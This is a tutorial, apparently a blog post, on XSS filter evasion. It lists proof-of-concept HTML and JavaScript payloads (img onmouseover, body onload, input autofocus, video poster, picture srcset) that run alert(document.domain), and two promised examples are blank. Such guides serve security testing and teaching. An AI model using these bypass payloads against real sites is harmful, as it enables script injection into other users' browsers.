Guide: Cross-Site Scripting (XSS) Evasion Techniques – Part 2

After sorting out the basic concepts in Part 1, I think it’s time to continue with more complicated techniques. Our main area of focus will be the evasion of misconfigured Anti-XSS modules.

In case the web application forbids the character “/” and the payload is reflected into the HTML document we can use an HTML tag which does not have as requirement the “/” in order to work properly. For example the image tag:

<img src=x onmouseover=alert(document.domain)>

What if the application does not allow spaces to be reflected in the response page. Then we can use something like the following:


What if we can write inside the <body> tag. Then we can start using events like the onload event. For example:

<body onload=alert(document.domain)>

What if the application has an Anti-XSS mechanism that removes the valid tags but does not have recursive regular expressions? Then we can use an intentionally malicious tag which will be valid after the first pass of the security mechanism. For example:


What if all the (theoretically) known tags have been blacklisted as invalid? Lets use HTML5 tags. For example:

Using Self-executing focus event via autofocus

<input onfocus=alert(document.domain) autofocus>

Using the <VIDEO> poster attribute

<video poster=javascript:alert(document.domain)//></video>

Using the <BODY> onscroll autofocus

<body onscroll=alert(document.domain)><br><br>...<br><br><input autofocus>

Using the <VIDEO> and <SOURCE> tag

<video><source onerror="alert(document.domain)">

Using the <BODY> and oninput attribute

<body oninput=alert(document.domain)><input autofocus>

Using the HTML5 <picture> element and “srcset” attributes

<picture><source srcset="x"><img onerror="alert(document.domain)"></picture>
<picture><img srcset="x" onerror="alert(document.domain)"></picture>
<img srcset="x" onerror="alert(document.domain)">